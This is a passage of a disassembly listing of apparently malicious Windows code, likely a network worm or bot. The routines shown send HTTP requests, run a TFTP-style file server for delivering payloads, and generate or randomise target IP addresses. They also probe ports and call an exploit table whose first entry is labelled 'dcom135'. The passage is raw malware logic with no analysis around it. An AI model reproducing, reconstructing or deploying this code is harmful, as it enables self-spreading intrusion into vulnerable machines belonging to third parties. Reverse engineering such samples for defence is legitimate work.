arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call ds:dword_43AD10 ;; WSAStartup
push 6
push 1
push 2
call ds:dword_43AE18 ;; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_14]
call ds:dword_43AD98 ;; htons
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_40ADCA
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_43AD40 ;; connect
cmp eax, 0FFFFFFFFh
jz short loc_406BD5
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_406B71
mov eax, offset byte_436EDC
loc_406B71: ; CODE XREF: sub_406AF8+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+var_110]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi
push eax
call sub_41782A
add esp, 1Ch
lea eax, [ebp+var_110]
push edi
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_110]
push eax
push ebx
call ds:dword_43ADE8 ;; send
push esi
lea eax, [ebp+var_110]
push edi
push eax
call sub_417390
add esp, 0Ch
lea eax, [ebp+var_110]
push edi
push esi
push eax
push ebx
call ds:dword_43ADB0 ;; recv
pop esi
loc_406BD5: ; CODE XREF: sub_406AF8+6B�j
push ebx
call ds:dword_43AE30 ;; closesocket
call ds:dword_43ACF8 ;; WSACleanup
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_310]
push eax
call sub_4172B0
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_406C15
push edi
lea eax, [ebp+var_310]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_406C15: ; CODE XREF: sub_406AF8+102�j
pop edi
pop ebx
leave
retn
sub_406AF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C19 proc near ; CODE XREF: sub_406C19:loc_407104�p
; DATA XREF: sub_407252+107�o ...
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_780 = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 884h
push ebx
push esi
push edi
mov edx, [ebp+arg_0]
mov esi, offset aOctet ; "octet"
lea edi, [ebp+var_1C]
movsd
push 1
xor ebx, ebx
movsw
pop eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_37C]
push ebx
push 2
rep movsd
inc [ebp+var_16C]
push 2
mov [ebp+var_C], eax
mov [edx+2A0h], eax
call ds:dword_43AE18 ;; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_406CDC
push 190h
call ds:dword_424064 ;; Sleep
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_780]
push offset unk_42AC38
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_E0], ebx
jnz short loc_406CBC
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40D679
add esp, 14h
loc_406CBC: ; CODE XREF: sub_406C19+7E�j
lea eax, [ebp+var_780]
push eax
call sub_40BF6D
push [ebp+var_170]
call sub_417078
pop ecx
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
loc_406CDC: ; CODE XREF: sub_406C19+50�j
mov eax, [ebp+var_170]
push 10h
imul eax, 234h
push ebx
mov ds:dword_4407FC[eax], edi
lea eax, [ebp+var_44]
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_44], 2
push [ebp+var_168]
call ds:dword_43AD98 ;; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_44]
push 10h
push eax
push edi
mov [ebp+var_40], ebx
call ds:dword_43ADC4 ;; bind
cmp eax, 0FFFFFFFFh
jnz short loc_406D41
push 1388h
call ds:dword_424064 ;; Sleep
dec [ebp+var_16C]
push [ebp+arg_0]
jmp loc_407104
; ---------------------------------------------------------------------------
loc_406D41: ; CODE XREF: sub_406C19+10D�j
lea eax, [ebp+var_378]
push offset aRb ; "rb"
push eax
call sub_4179A8
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jnz short loc_406DBF
push 190h
call ds:dword_424064 ;; Sleep
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_780]
push offset unk_42AC04
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40D679
lea eax, [ebp+var_780]
push eax
call sub_40BF6D
push [ebp+var_170]
call sub_417078
add esp, 28h
push ebx
call ds:dword_424054 ;; ExitThread
loc_406DBF: ; CODE XREF: sub_406C19+140�j
mov esi, 200h
loc_406DC4: ; CODE XREF: sub_406C19+4A5�j
mov eax, [ebp+arg_0]
cmp [eax+2A0h], ebx
jz loc_4070C4
mov [ebp+var_880], edi
mov edi, 80h
push edi
lea eax, [ebp+var_D8]
push ebx
push eax
mov [ebp+var_34], 5
mov [ebp+var_30], 1388h
mov [ebp+var_884], 1
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_34]
push eax
push ebx
lea eax, [ebp+var_884]
push ebx
push eax
push ebx
call ds:dword_43AD80 ;; select
test eax, eax
jle loc_4070B8
mov al, ds:byte_436EDC
mov ecx, edi
mov [ebp+var_580], al
xor eax, eax
lea edi, [ebp+var_57F]
mov [ebp+var_4], 10h
rep stosd
stosw
stosb
mov edi, [ebp+var_10]
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
lea eax, [ebp+var_D8]
push 80h
push eax
push edi
call ds:dword_43AD70 ;; recvfrom
push [ebp+var_28]
mov [ebp+var_C], eax
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_58]
push eax
call sub_4172B0
cmp [ebp+var_D8], bl
pop ecx
pop ecx
jnz loc_4070A2
cmp [ebp+var_D7], 1
jnz loc_406FEE
lea eax, [ebp+var_274]
push eax
call sub_417AB0
lea eax, [ebp+eax+var_D5]
mov [ebp+var_14], eax
lea eax, [ebp+var_274]
push eax
call sub_417AB0
push eax
lea eax, [ebp+var_D6]
push eax
lea eax, [ebp+var_274]
push eax
call sub_418DA0
add esp, 14h
test eax, eax
jnz loc_406FA8
lea eax, [ebp+var_1C]
push eax
call sub_417AB0
push eax
lea eax, [ebp+var_1C]
push [ebp+var_14]
push eax
call sub_418DA0
add esp, 10h
test eax, eax
jnz loc_406FA8
push ebx
push ebx
push [ebp+var_8]
call sub_418D0E
push [ebp+var_8]
lea eax, [ebp+var_57C]
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
push esi
push 1
push eax
mov [ebp+var_57E], bl
mov [ebp+var_57D], 1
call sub_418A86
add esp, 1Ch
lea ecx, [ebp+var_2C]
mov [ebp+var_C], eax
add eax, 4
push [ebp+var_4]
push ecx
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push edi
call ds:dword_43ADFC ;; sendto
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset dword_42ABBC
loc_406F5C: ; CODE XREF: sub_406C19+484�j
lea eax, [ebp+var_780]
push eax
call sub_4172B0
add esp, 10h
cmp [ebp+var_E0], ebx
jnz short loc_406F96
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_40D679
add esp, 14h
loc_406F96: ; CODE XREF: sub_406C19+358�j
lea eax, [ebp+var_780]
push eax
call sub_40BF6D
pop ecx
jmp loc_4070B8
; ---------------------------------------------------------------------------
loc_406FA8: ; CODE XREF: sub_406C19+2B6�j
; sub_406C19+2D7�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 13h
push offset dword_42ABA8
push edi
call ds:dword_43ADFC ;; sendto
lea eax, [ebp+var_274]
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_D8]
push offset unk_42AB74
push eax
call sub_4172B0
lea eax, [ebp+var_D8]
push eax
call sub_40BF6D
add esp, 14h
jmp loc_4070B8
; ---------------------------------------------------------------------------
loc_406FEE: ; CODE XREF: sub_406C19+275�j
cmp [ebp+var_D7], 4
jnz loc_4070A2
mov cl, [ebp+var_D5]
mov al, [ebp+var_D6]
cmp cl, 0FFh
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
jnz short loc_40702B
inc al
xor cl, cl
mov [ebp+var_57E], al
mov [ebp+var_57D], bl
jmp short loc_407039
; ---------------------------------------------------------------------------
loc_40702B: ; CODE XREF: sub_406C19+3FE�j
inc cl
mov [ebp+var_57E], al
mov [ebp+var_57D], cl
loc_407039: ; CODE XREF: sub_406C19+410�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
push ebx
shl eax, 9
sub eax, esi
push eax
push [ebp+var_8]
call sub_418D0E
push [ebp+var_8]
lea eax, [ebp+var_57C]
push esi
push 1
push eax
call sub_418A86
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_2C]
mov [ebp+var_C], edi
push [ebp+var_4]
push eax
lea eax, [edi+4]
push ebx
push eax
loc_407079: ; DATA XREF: _2:004282F8�o _2:0042830C�o ...
lea eax, [ebp+var_580]
push eax
push [ebp+var_10]
call ds:dword_43ADFC ;; sendto
cmp edi, ebx
jnz short loc_4070B8
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset dword_42AB20
jmp loc_406F5C
; ---------------------------------------------------------------------------
loc_4070A2: ; CODE XREF: sub_406C19+268�j
; sub_406C19+3DC�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 9
push offset dword_42AB14
push edi
call ds:dword_43ADFC ;; sendto
loc_4070B8: ; CODE XREF: sub_406C19+204�j
; sub_406C19+38A�j ...
cmp [ebp+var_C], ebx
mov edi, [ebp+var_10]
jg loc_406DC4
loc_4070C4: ; CODE XREF: sub_406C19+1B4�j
push edi
call ds:dword_43AE30 ;; closesocket
push [ebp+var_8]
call sub_417900
mov esi, [ebp+arg_0]
dec [ebp+var_16C]
pop ecx
cmp [esi+2A0h], ebx
jnz short loc_4070F8
push [ebp+var_170]
call sub_417078
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
loc_4070F8: ; CODE XREF: sub_406C19+4CA�j
push 3E8h
call ds:dword_424064 ;; Sleep
push esi
loc_407104: ; CODE XREF: sub_406C19+123�j
call sub_406C19
pop edi
pop esi
pop ebx
leave
retn 4
sub_406C19 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407110 proc near ; CODE XREF: sub_40EE72+5D3F�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset unk_42B134
push eax
xor ebx, ebx
call sub_4172B0
cmp ds:dword_42ACB0, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40717E
push esi
mov esi, offset dword_42ACB8
loc_407143: ; CODE XREF: sub_407110+6B�j
mov eax, [esi]
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_4172B0
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_418DE0
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_407143
pop esi
loc_40717E: ; CODE XREF: sub_407110+2B�j
push ds:dword_4CD5F0
call sub_40B721
pop ecx
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_4172B0
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_418DE0
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
lea eax, [ebp+var_200]
push eax
call sub_40BF6D
add esp, 34h
pop edi
pop ebx
leave
retn
sub_407110 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4071DB proc near ; CODE XREF: sub_40EE72+56B3�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 8
call sub_416FA4
test eax, eax
pop ecx
jle short loc_407217
mov eax, [ebp+arg_C]
push ds:dword_436F18[eax*8]
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset unk_42B198
push eax
call sub_4172B0
add esp, 0Ch
jmp short loc_40722A
; ---------------------------------------------------------------------------
loc_407217: ; CODE XREF: sub_4071DB+13�j
lea eax, [ebp+var_200]
push offset unk_42B168
push eax
call sub_4172B0
pop ecx
pop ecx
loc_40722A: ; CODE XREF: sub_4071DB+3A�j
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
lea eax, [ebp+var_200]
push eax
call sub_40BF6D
add esp, 18h
leave
retn
sub_4071DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407252 proc near ; CODE XREF: sub_40797F+4F�p
var_210 = dword ptr -210h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_4075E2
imul eax, 3Ch
xor ebx, ebx
cmp ds:dword_42ACBC[eax], ebx
jz loc_4074C3
push 4
call sub_416FA4
test eax, eax
pop ecx
jnz loc_4075E2
mov eax, ds:dword_42F5AC
push edi
mov edi, offset dword_438F34
push 104h
push edi
push ebx
mov ds:dword_439144, eax
mov ds:dword_439140, ebx
call ds:off_424094
push 103h
mov esi, offset dword_439038
push offset byte_42F674
push esi
call sub_418C10
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov ds:dword_438F30, eax
mov eax, [ebp+arg_138]
push 7Fh
mov ds:dword_4391C8, eax
jnz short loc_407305
lea eax, [ebp+arg_10]
push eax
push offset dword_439148
call sub_418C10
add esp, 0Ch
mov ds:dword_4391CC, 1
jmp short loc_40731F
; ---------------------------------------------------------------------------
loc_407305: ; CODE XREF: sub_407252+94�j
lea eax, [ebp+arg_90]
push eax
push offset dword_439148
call sub_418C10
add esp, 0Ch
mov ds:dword_4391CC, ebx
loc_40731F: ; CODE XREF: sub_407252+B1�j
push esi
push edi
push ds:dword_439144
lea eax, [ebp+var_204]
push offset unk_42B328
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_416D5C
add esp, 20h
mov ds:dword_43913C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_438F30
push offset sub_406C19
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, ds:dword_43913C
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_40738E
loc_40737C: ; CODE XREF: sub_407252+13A�j
cmp ds:dword_4391D0, ebx
jnz short loc_4073A9
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_40737C
; ---------------------------------------------------------------------------
loc_40738E: ; CODE XREF: sub_407252+128�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_42B2E8
push eax
call sub_4172B0
add esp, 0Ch
loc_4073A9: ; CODE XREF: sub_407252+130�j
lea eax, [ebp+var_204]
push eax
call sub_40BF6D
mov edi, offset dword_43958C
mov [esp+210h+var_210], 104h
push edi
push ebx
mov ds:dword_439798, ebx
call ds:off_424094
push 103h
mov esi, offset dword_439690
push offset byte_42F674
push esi
call sub_418C10
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov ds:dword_439588, eax
mov eax, [ebp+arg_138]
push 7Fh
mov ds:dword_439820, eax
jnz short loc_407424
lea eax, [ebp+arg_10]
push eax
push offset dword_4397A0
call sub_418C10
add esp, 0Ch
mov ds:dword_439824, 1
jmp short loc_40743E
; ---------------------------------------------------------------------------
loc_407424: ; CODE XREF: sub_407252+1B3�j
lea eax, [ebp+arg_90]
push eax
push offset dword_4397A0
call sub_418C10
add esp, 0Ch
mov ds:dword_439824, ebx
loc_40743E: ; CODE XREF: sub_407252+1D0�j
push esi
push edi
push ds:dword_43979C
lea eax, [ebp+var_204]
push offset dword_42B298
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_416D5C
add esp, 20h
mov ds:dword_439794, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_439588
push offset sub_4053D5
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, ds:dword_439794
pop edi
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_4074B2
loc_40749C: ; CODE XREF: sub_407252+25E�j
cmp ds:dword_439828, ebx
jnz loc_4075D5
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_40749C
; ---------------------------------------------------------------------------
loc_4074B2: ; CODE XREF: sub_407252+248�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_42B258
jmp loc_4075C6
; ---------------------------------------------------------------------------
loc_4074C3: ; CODE XREF: sub_407252+25�j
cmp ds:dword_42ACC0[eax], ebx
jz loc_4075E2
push 3
call sub_416FA4
test eax, eax
pop ecx
jnz loc_4075E2
mov esi, offset dword_439464
push 104h
push esi
push ebx
call ds:off_424094
push 5Ch
push esi
call sub_418F10
pop ecx
cmp eax, ebx
pop ecx
jz short loc_407501
mov [eax], bl
loc_407501: ; CODE XREF: sub_407252+2AB�j
mov eax, ds:dword_42F5B0
mov ds:dword_43957C, ebx
mov ds:dword_439568, eax
lea eax, [ebp+arg_10]
push eax
push offset dword_4391DC
call sub_4172B0
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov ds:dword_4391D8, eax
mov ecx, [ebp+arg_138]
push esi
push ds:dword_439568
mov ds:dword_439574, ecx
mov ecx, [ebp+arg_13C]
push eax
mov ds:dword_439578, ecx
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_204]
push offset unk_42B20C
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_204]
push 3
push eax
call sub_416D5C
add esp, 20h
mov ds:dword_439570, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4391D8
push offset sub_405AF2
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, ds:dword_439570
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_4075BA
loc_4075A8: ; CODE XREF: sub_407252+366�j
cmp ds:dword_439584, ebx
jnz short loc_4075D5
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_4075A8
; ---------------------------------------------------------------------------
loc_4075BA: ; CODE XREF: sub_407252+354�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_42B1C8
loc_4075C6: ; CODE XREF: sub_407252+26C�j
lea eax, [ebp+var_204]
push eax
call sub_4172B0
add esp, 0Ch
loc_4075D5: ; CODE XREF: sub_407252+250�j
; sub_407252+35C�j
lea eax, [ebp+var_204]
push eax
call sub_40BF6D
pop ecx
loc_4075E2: ; CODE XREF: sub_407252+14�j
; sub_407252+35�j ...
pop esi
pop ebx
leave
retn
sub_407252 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4075E6 proc near ; CODE XREF: sub_407767:loc_4077D8�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:436F18h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_417390
add esp, 0Ch
push [ebp+arg_0]
call ds:dword_43ACCC ;; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call ds:dword_43AD94 ;; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_417390
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_4075E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40762E proc near ; CODE XREF: sub_407767+69�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_417AB0
cmp eax, 0Fh
pop ecx
jbe short loc_407656
xor eax, eax
jmp short loc_4076C7
; ---------------------------------------------------------------------------
loc_407656: ; CODE XREF: sub_40762E+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_418A52
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_407683
call sub_41730C
mov [ebp+var_C], eax
loc_407683: ; CODE XREF: sub_40762E+4B�j
cmp [ebp+var_8], esi
jnz short loc_407690
call sub_41730C
mov [ebp+var_8], eax
loc_407690: ; CODE XREF: sub_40762E+58�j
cmp [ebp+var_4], esi
jnz short loc_40769D
call sub_41730C
mov [ebp+var_4], eax
loc_40769D: ; CODE XREF: sub_40762E+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_4076A9
call sub_41730C
loc_4076A9: ; CODE XREF: sub_40762E+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov ds:dword_436F18[ecx*8], eax
loc_4076C7: ; CODE XREF: sub_40762E+26�j
pop esi
leave
retn
sub_40762E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4076CA proc near ; CODE XREF: sub_407767+BB�p
; sub_40D4C5+30�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push ebx
push edi
push 2
mov [ebp+var_4], edi
call ds:dword_43AE18 ;; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4076F3
xor eax, eax
jmp short loc_407762
; ---------------------------------------------------------------------------
loc_4076F3: ; CODE XREF: sub_4076CA+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call ds:dword_43AD98 ;; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call ds:dword_43AE34 ;; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call ds:dword_43AD40 ;; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call ds:dword_43AD80 ;; select
push esi
mov edi, eax
call ds:dword_43AE30 ;; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_407762: ; CODE XREF: sub_4076CA+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_4076CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407767 proc near ; DATA XREF: sub_40797F+13B�o
var_2A8 = dword ptr -2A8h
var_28C = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_150 = byte ptr -150h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call ds:dword_424058 ;; GetTickCount
push eax
call sub_417302
mov ebx, esi
pop ecx
imul ebx, 234h
loc_4077AE: ; CODE XREF: sub_407767+204�j
mov eax, ds:dword_4407F4[ebx]
cmp ds:dword_436F1C[eax*8], 0
jz loc_407970
cmp [ebp+var_10], 0
push eax
jz short loc_4077D8
lea eax, [ebp+var_150]
push eax
call sub_40762E
pop ecx
jmp short loc_4077DD
; ---------------------------------------------------------------------------
loc_4077D8: ; CODE XREF: sub_407767+60�j
call sub_4075E6
loc_4077DD: ; CODE XREF: sub_407767+6F�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push ds:dword_4407F4[ebx]
push [ebp+var_3C]
push edi
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_42B3BC
push eax
call sub_4172B0
add esp, 18h
lea eax, [ebp+var_28C]
push eax
lea eax, dword_4405F0[ebx]
push eax
call sub_4172B0
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_4076CA
add esp, 14h
cmp eax, 1
jnz loc_407960
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_4078B4
push offset dword_438F18
call ds:dword_4240C8 ;; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_42B384
push eax
call sub_4172B0
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_407896
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_C0]
jnz short loc_40788A
lea eax, [ebp+var_140]
loc_40788A: ; CODE XREF: sub_407767+11B�j
push eax
push [ebp+var_40]
call sub_40D679
add esp, 14h
loc_407896: ; CODE XREF: sub_407767+100�j
lea eax, [ebp+var_28C]
push eax
call sub_40BF6D
mov [esp+2A8h+var_2A8], offset dword_438F18
call ds:dword_4240C4 ;; RtlLeaveCriticalSection
jmp loc_407960
; ---------------------------------------------------------------------------
loc_4078B4: ; CODE XREF: sub_407767+D0�j
push edi
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_208]
push eax
call sub_4172B0
mov eax, [ebp+var_20]
pop ecx
imul eax, 3Ch
pop ecx
add eax, offset aDcom135_0 ; "dcom135"
push eax
lea eax, [ebp+var_178]
push eax
call sub_4172B0
cmp [ebp+var_C0], 0
pop ecx
pop ecx
lea eax, [ebp+var_C0]
jnz short loc_4078F9
lea eax, [ebp+var_140]
loc_4078F9: ; CODE XREF: sub_407767+18A�j
push eax
lea eax, [ebp+var_1F8]
push eax
call sub_4172B0
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_164], eax
imul eax, 3Ch
sub esp, 0BCh
mov [ebp+var_168], esi
lea esi, [ebp+var_20C]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call ds:off_42ACB4[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
